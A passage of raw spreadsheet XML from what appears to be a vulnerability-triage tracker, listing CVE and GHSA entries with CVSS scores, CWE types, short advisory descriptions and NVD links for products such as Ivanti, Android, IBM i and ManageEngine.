t="n"><v>0.001</v></c><c r="I223" s="5" t="inlineStr" /><c r="J223" s="5" t="inlineStr" /><c r="K223" s="5" t="inlineStr" /><c r="L223" s="5" t="inlineStr" /><c r="M223" s="5" t="inlineStr" /><c r="N223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O223" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P223" s="5" t="inlineStr" /><c r="Q223" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R223" s="5" t="inlineStr"><is><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is></c><c r="S223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-30156</t></is></c></row><row r="224"><c r="A224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C224" s="5" t="inlineStr"><is><t>CVE-2026-50093</t></is></c><c r="D224" s="5" t="n"><v>8.9</v></c><c r="E224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F224" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G224" s="5" t="inlineStr" /><c r="H224" s="5" t="n"><v>0.002</v></c><c r="I224" s="5" t="inlineStr" /><c r="J224" s="5" t="inlineStr" /><c r="K224" s="5" t="inlineStr" /><c r="L224" s="5" t="inlineStr" /><c r="M224" s="5" t="inlineStr" /><c r="N224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P224" s="5" t="inlineStr" /><c r="Q224" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="R224" s="5" t="inlineStr"><is><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is></c><c r="S224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t></is></c></row><row r="225"><c r="A225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B225" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C225" s="5" t="inlineStr"><is><t>CVE-2026-5706</t></is></c><c r="D225" s="5" t="n"><v>8.9</v></c><c r="E225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F225" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G225" s="5" t="inlineStr" /><c r="H225" s="5" t="n"><v>0.003</v></c><c r="I225" s="5" t="inlineStr" /><c r="J225" s="5" t="inlineStr" /><c r="K225" s="5" t="inlineStr" /><c r="L225" s="5" t="inlineStr" /><c r="M225" s="5" t="inlineStr" /><c r="N225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O225" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P225" s="5" t="inlineStr" /><c r="Q225" s="5" t="inlineStr"><is><t>CWE-130</t></is></c><c r="R225" s="5" t="inlineStr"><is><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is></c><c r="S225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5706</t></is></c></row><row r="226"><c r="A226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B226" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C226" s="5" t="inlineStr"><is><t>CVE-2026-86165</t></is></c><c r="D226" s="5" t="n"><v>8.9</v></c><c r="E226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F226" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G226" s="5" t="inlineStr" /><c r="H226" s="5" t="n"><v>0.006</v></c><c r="I226" s="5" t="inlineStr" /><c r="J226" s="5" t="inlineStr" /><c r="K226" s="5" t="inlineStr" /><c r="L226" s="5" t="inlineStr" /><c r="M226" s="5" t="inlineStr" /><c r="N226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O226" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P226" s="5" t="inlineStr" /><c r="Q226" s="5" t="inlineStr"><is><t>CWE-119, CWE-120</t></is></c><c r="R226" s="5" t="inlineStr"><is><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is></c><c r="S226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86165</t></is></c></row><row r="227"><c r="A227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B227" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C227" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D227" s="5" t="n"><v>8.9</v></c><c r="E227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F227" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G227" s="5" t="inlineStr" /><c r="H227" s="5" t="inlineStr" /><c r="I227" s="5" t="inlineStr" /><c r="J227" s="5" t="inlineStr" /><c r="K227" s="5" t="inlineStr" /><c r="L227" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M227" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N227" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O227" s="5" t="inlineStr" /><c r="P227" s="5" t="inlineStr" /><c r="Q227" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R227"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S227" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="228"><c r="A228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B228" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C228" s="5" t="inlineStr"><is><t>CVE-2025-9049</t></is></c><c r="D228" s="5" t="n"><v>8.800000000000001</v></c><c r="E228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F228" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G228" s="5" t="inlineStr" /><c r="H228" s="5" t="n"><v>0.002</v></c><c r="I228" s="5" t="inlineStr" /><c r="J228" s="5" t="inlineStr" /><c r="K228" s="5" t="inlineStr" /><c r="L228" s="5" t="inlineStr" /><c r="M228" s="5" t="inlineStr" /><c r="N228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O228" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P228" s="5" t="inlineStr" /><c r="Q228" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R228" s="5" t="inlineStr"><is><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is></c><c r="S228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-9049</t></is></c></row><row r="229"><c r="A229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C229" s="5" t="inlineStr"><is><t>CVE-2026-12648</t></is></c><c r="D229" s="5" t="n"><v>8.800000000000001</v></c><c r="E229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F229" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G229" s="5" t="inlineStr" /><c r="H229" s="5" t="n"><v>0.015</v></c><c r="I229" s="5" t="inlineStr" /><c r="J229" s="5" t="inlineStr" /><c r="K229" s="5" t="inlineStr" /><c r="L229" s="5" t="inlineStr" /><c r="M229" s="5" t="inlineStr" /><c r="N229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P229" s="5" t="inlineStr" /><c r="Q229" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R229" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t></is></c></row><row r="230"><c r="A230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C230" s="5" t="inlineStr"><is><t>CVE-2026-12651</t></is></c><c r="D230" s="5" t="n"><v>8.800000000000001</v></c><c r="E230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F230" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G230" s="5" t="inlineStr" /><c r="H230" s="5" t="n"><v>0.015</v></c><c r="I230" s="5" t="inlineStr" /><c r="J230" s="5" t="inlineStr" /><c r="K230" s="5" t="inlineStr" /><c r="L230" s="5" t="inlineStr" /><c r="M230" s="5" t="inlineStr" /><c r="N230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P230" s="5" t="inlineStr" /><c r="Q230" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R230" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t></is></c></row><row r="231"><c r="A231" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B231" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C231" s="5" t="inlineStr"><is><t>CVE-2026-13761</t></is></c><c r="D231" s="5" t="n"><v>8.800000000000001</v></c><c r="E231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F231" s="5" t="inlineStr"><is><t>security@pega.com</t></is></c><c r="G231" s="5" t="inlineStr" /><c r="H231" s="5" t="n"><v>0.003</v></c><c r="I231" s="5" t="inlineStr" /><c r="J231" s="5" t="inlineStr" /><c r="K231" s="5" t="inlineStr" /><c r="L231" s="5" t="inlineStr" /><c r="M231" s="5" t="inlineStr" /><c r="N231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O231" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P231" s="5" t="inlineStr" /><c r="Q231" s="5" t="inlineStr"><is><t>CWE-606</t></is></c><c r="R231" s="5" t="inlineStr"><is><t>Pega Platform versions 7.1.0 through 25.1.2 are affected by an improper validation of inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.</t></is></c><c r="S231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-13761</t></is></c></row><row r="232"><c r="A232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B232" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C232" s="5" t="inlineStr"><is><t>CVE-2026-14828</t></is></c><c r="D232" s="5" t="n"><v>8.800000000000001</v></c><c r="E232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F232" s="5" t="inlineStr"><is><t>0fc0942c-577d-436f-ae8e-945763c79b02</t></is></c><c r="G232" s="5" t="inlineStr" /><c r="H232" s="5" t="n"><v>0.014</v></c><c r="I232" s="5" t="inlineStr" /><c r="J232" s="5" t="inlineStr" /><c r="K232" s="5" t="inlineStr" /><c r="L232" s="5" t="inlineStr" /><c r="M232" s="5" t="inlineStr" /><c r="N232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O232" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P232" s="5" t="inlineStr" /><c r="Q232" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R232" s="5" t="inlineStr"><is><t>Zohocorp ManageEngine Password Manager Pro versions before 13235, PAM360 versions before 8561, and Access Manager Plus versions before 4405 are vulnerable to an authenticated SQL Injection vulnerability.</t></is></c><c r="S232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-14828</t></is></c></row><row r="233"><c r="A233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C233" s="5" t="inlineStr"><is><t>CVE-2026-16502</t></is></c><c r="D233" s="5" t="n"><v>8.800000000000001</v></c><c r="E233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F233" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G233" s="5" t="inlineStr" /><c r="H233" s="5" t="n"><v>0.005</v></c><c r="I233" s="5" t="inlineStr" /><c r="J233" s="5" t="inlineStr" /><c r="K233" s="5" t="inlineStr" /><c r="L233" s="5" t="inlineStr" /><c r="M233" s="5" t="inlineStr" /><c r="N233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P233" s="5" t="inlineStr" /><c r="Q233" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R233" s="5" t="inlineStr"><is><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is></c><c r="S233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t></is></c></row><row r="234"><c r="A234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B234" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C234" s="5" t="inlineStr"><is><t>CVE-2026-18198</t></is></c><c r="D234" s="5" t="n"><v>8.800000000000001</v></c><c r="E234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G234" s="5" t="inlineStr" /><c r="H234" s="5" t="n"><v>0.002</v></c><c r="I234" s="5" t="inlineStr" /><c r="J234" s="5" t="inlineStr" /><c r="K234" s="5" t="inlineStr" /><c r="L234" s="5" t="inlineStr" /><c r="M234" s="5" t="inlineStr" /><c r="N234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O234" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P234" s="5" t="inlineStr" /><c r="Q234" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R234" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in TAC Information Services Internal and External Trade Inc. GOLDENHORN ONEIT allows Blind SQL Injection.

This issue affects GOLDENHORN ONEIT: before Göbeklitepe.</t></is></c><c r="S234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18198</t></is></c></row><row r="235"><c r="A235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B235" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C235" s="5" t="inlineStr"><is><t>CVE-2026-18341</t></is></c><c r="D235" s="5" t="n"><v>8.800000000000001</v></c><c r="E235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G235" s="5" t="inlineStr" /><c r="H235" s="5" t="n"><v>0.002</v></c><c r="I235" s="5" t="inlineStr" /><c r="J235" s="5" t="inlineStr" /><c r="K235" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L235" s="5" t="inlineStr" /><c r="M235" s="5" t="inlineStr" /><c r="N235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O235" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P235" s="5" t="inlineStr" /><c r="Q235" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="R235" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to corrupt memory due to an integer underflow.</t></is></c><c r="S235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18341</t></is></c></row><row r="236"><c r="A236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B236" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C236" s="5" t="inlineStr"><is><t>CVE-2026-18480</t></is></c><c r="D236" s="5" t="n"><v>8.800000000000001</v></c><c r="E236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G236" s="5" t="inlineStr" /><c r="H236" s="5" t="n"><v>0.002</v></c><c r="I236" s="5" t="inlineStr" /><c r="J236" s="5" t="inlineStr" /><c r="K236" s="5" t="inlineStr" /><c r="L236" s="5" t="inlineStr" /><c r="M236" s="5" t="inlineStr" /><c r="N236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O236" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P236" s="5" t="inlineStr" /><c r="Q236" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R236" s="5" t="inlineStr"><is><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is></c><c r="S236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18480</t></is></c></row><row r="237"><c r="A237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C237" s="5" t="inlineStr"><is><t>CVE-2026-18851</t></is></c><c r="D237" s="5" t="n"><v>8.800000000000001</v></c><c r="E237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F237" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G237" s="5" t="inlineStr" /><c r="H237" s="5" t="n"><v>0.01</v></c><c r="I237" s="5" t="inlineStr" /><c r="J237" s="5" t="inlineStr" /><c r="K237" s="5" t="inlineStr"><is><t>ivanti:endpoint_manager_mobile</t></is></c><c r="L237" s="5" t="inlineStr" /><c r="M237" s="5" t="inlineStr" /><c r="N237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P237" s="5" t="inlineStr" /><c r="Q237" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R237" s="5" t="inlineStr"><is><t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t></is></c><c r="S237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t></is></c></row><row r="238"><c r="A238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B238" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C238" s="5" t="inlineStr"><is><t>CVE-2026-19887</t></is></c><c r="D238" s="5" t="n"><v>8.800000000000001</v></c><c r="E238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F238" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G238" s="5" t="inlineStr" /><c r="H238" s="5" t="n"><v>0.006</v></c><c r="I238" s="5" t="inlineStr" /><c r="J238" s="5" t="inlineStr" /><c r="K238" s="5" t="inlineStr" /><c r="L238" s="5" t="inlineStr" /><c r="M238" s="5" t="inlineStr" /><c r="N238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O238" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P238" s="5" t="inlineStr" /><c r="Q238" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R238" s="5" t="inlineStr"><is><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is></c><c r="S238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19887</t></is></c></row><row r="239"><c r="A239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C239" s="5" t="inlineStr"><is><t>CVE-2026-28609</t></is></c><c r="D239" s="5" t="n"><v>8.800000000000001</v></c><c r="E239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F239" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G239" s="5" t="inlineStr" /><c r="H239" s="5" t="n"><v>0.003</v></c><c r="I239" s="5" t="inlineStr" /><c r="J239" s="5" t="inlineStr" /><c r="K239" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L239" s="5" t="inlineStr" /><c r="M239" s="5" t="inlineStr" /><c r="N239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P239" s="5" t="inlineStr" /><c r="Q239" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="R239" s="5" t="inlineStr"><is><t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t></is></c></row><row r="240"><c r="A240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C240" s="5" t="inlineStr"><is><t>CVE-2026-28618</t></is></c><c r="D240" s="5" t="n"><v>8.800000000000001</v></c><c r="E240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F240" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G240" s="5" t="inlineStr" /><c r="H240" s="5" t="n"><v>0.003</v></c><c r="I240" s="5" t="inlineStr" /><c r="J240" s="5" t="inlineStr" /><c r="K240" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L240" s="5" t="inlineStr" /><c r="M240" s="5" t="inlineStr" /><c r="N240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P240" s="5" t="inlineStr" /><c r="Q240" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="R240" s="5" t="inlineStr"><is><t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t></is></c></row><row r="241"><c r="A241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C241" s="5" t="inlineStr"><is><t>CVE-2026-28666</t></is></c><c r="D241" s="5" t="n"><v>8.800000000000001</v></c><c r="E241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F241" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G241" s="5" t="inlineStr" /><c r="H241" s="5" t="n"><v>0.003</v></c><c r="I241" s="5" t="inlineStr" /><c r="J241" s="5" t="inlineStr" /><c r="K241" s="5" t="inlineStr" /><c r="L241" s="5" t="inlineStr" /><c r="M241" s="5" t="inlineStr" /><c r="N241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P241" s="5" t="inlineStr" /><c r="Q241" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R241" s="5" t="inlineStr"><is><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is></c><c r="S241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t></is></c></row><row r="242"><c r="A242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C242" s="5" t="inlineStr"><is><t>CVE-2026-30754</t></is></c><c r="D242" s="5" t="n"><v>8.800000000000001</v></c><c r="E242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G242" s="5" t="inlineStr" /><c r="H242" s="5" t="n"><v>0.003</v></c><c r="I242" s="5" t="inlineStr" /><c r="J242" s="5" t="inlineStr" /><c r="K242" s="5" t="inlineStr" /><c r="L242" s="5" t="inlineStr" /><c r="M242" s="5" t="inlineStr" /><c r="N242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P242" s="5" t="inlineStr" /><c r="Q242" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R242" s="5" t="inlineStr"><is><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is></c><c r="S242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t></is></c></row><row r="243"><c r="A243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B243" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C243" s="5" t="inlineStr"><is><t>CVE-2026-39944</t></is></c><c r="D243" s="5" t="n"><v>8.800000000000001</v></c><c r="E243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F243" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G243" s="5" t="inlineStr" /><c r="H243" s="5" t="n"><v>0.002</v></c><c r="I243" s="5" t="inlineStr" /><c r="J243" s="5" t="inlineStr" /><c r="K243" s="5" t="inlineStr" /><c r="L243" s="5" t="inlineStr" /><c r="M243" s="5" t="inlineStr" /><c r="N243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O243" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P243" s="5" t="inlineStr" /><c r="Q243" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R243" s="5" t="inlineStr"><is><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is></c><c r="S243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-39944</t></is></c></row><row r="244"><c r="A244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C244" s="5" t="inlineStr"><is><t>CVE-2026-49879</t></is></c><c r="D244" s="5" t="n"><v>8.800000000000001</v></c><c r="E244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F244" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G244" s="5" t="inlineStr" /><c r="H244" s="5" t="n"><v>0.003</v></c><c r="I244" s="5" t="inlineStr" /><c r="J244" s="5" t="inlineStr" /><c r="K244" s="5" t="inlineStr" /><c r="L244" s="5" t="inlineStr" /><c r="M244" s="5" t="inlineStr" /><c r="N244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P244" s="5" t="inlineStr" /><c r="Q244" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R244" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t></is></c></row><row r="245"><c r="A245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C245" s="5" t="inlineStr"><is><t>CVE-2026-49882</t></is></c><c r="D245" s="5" t="n"><v>8.800000000000001</v></c><c r="E245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F245" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G245" s="5" t="inlineStr" /><c r="H245" s="5" t="n"><v>0.003</v></c><c r="I245" s="5" t="inlineStr" /><c r="J245" s="5" t="inlineStr" /><c r="K245" s="5" t="inlineStr" /><c r="L245" s="5" t="inlineStr" /><c r="M245" s="5" t="inlineStr" /><c r="N245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P245" s="5" t="inlineStr" /><c r="Q245" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R245" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t></is></c></row><row r="246"><c r="A246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B246" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C246" s="5" t="inlineStr"><is><t>CVE-2026-51974</t></is></c><c r="D246" s="5" t="n"><v>8.800000000000001</v></c><c r="E246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F246" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G246" s="5" t="inlineStr" /><c r="H246" s="5" t="n"><v>0.004</v></c><c r="I246" s="5" t="inlineStr" /><c r="J246" s="5" t="inlineStr" /><c r="K246" s="5" t="inlineStr" /><c r="L246" s="5" t="inlineStr" /><c r="M246" s="5" t="inlineStr" /><c r="N246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O246" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P246" s="5" t="inlineStr" /><c r="Q246" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R246" s="5" t="inlineStr"><is><t>An eval() injection vulnerability in the get_list function in modules/meta_parser.py in lllyasviel Fooocus 2.1.854 through 2.5.5 allows remote attackers to execute arbitrary Python code via a crafted styles payload in the EXIF metadata of an uploaded image file.</t></is></c><c r="S246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-51974</t></is></c></row><row r="247"><c r="A247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B247" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C247" s="5" t="inlineStr"><is><t>CVE-2026-52691</t></is></c><c r="D247" s="5" t="n"><v>8.800000000000001</v></c><c r="E247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F247" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G247" s="5" t="inlineStr" /><c r="H247" 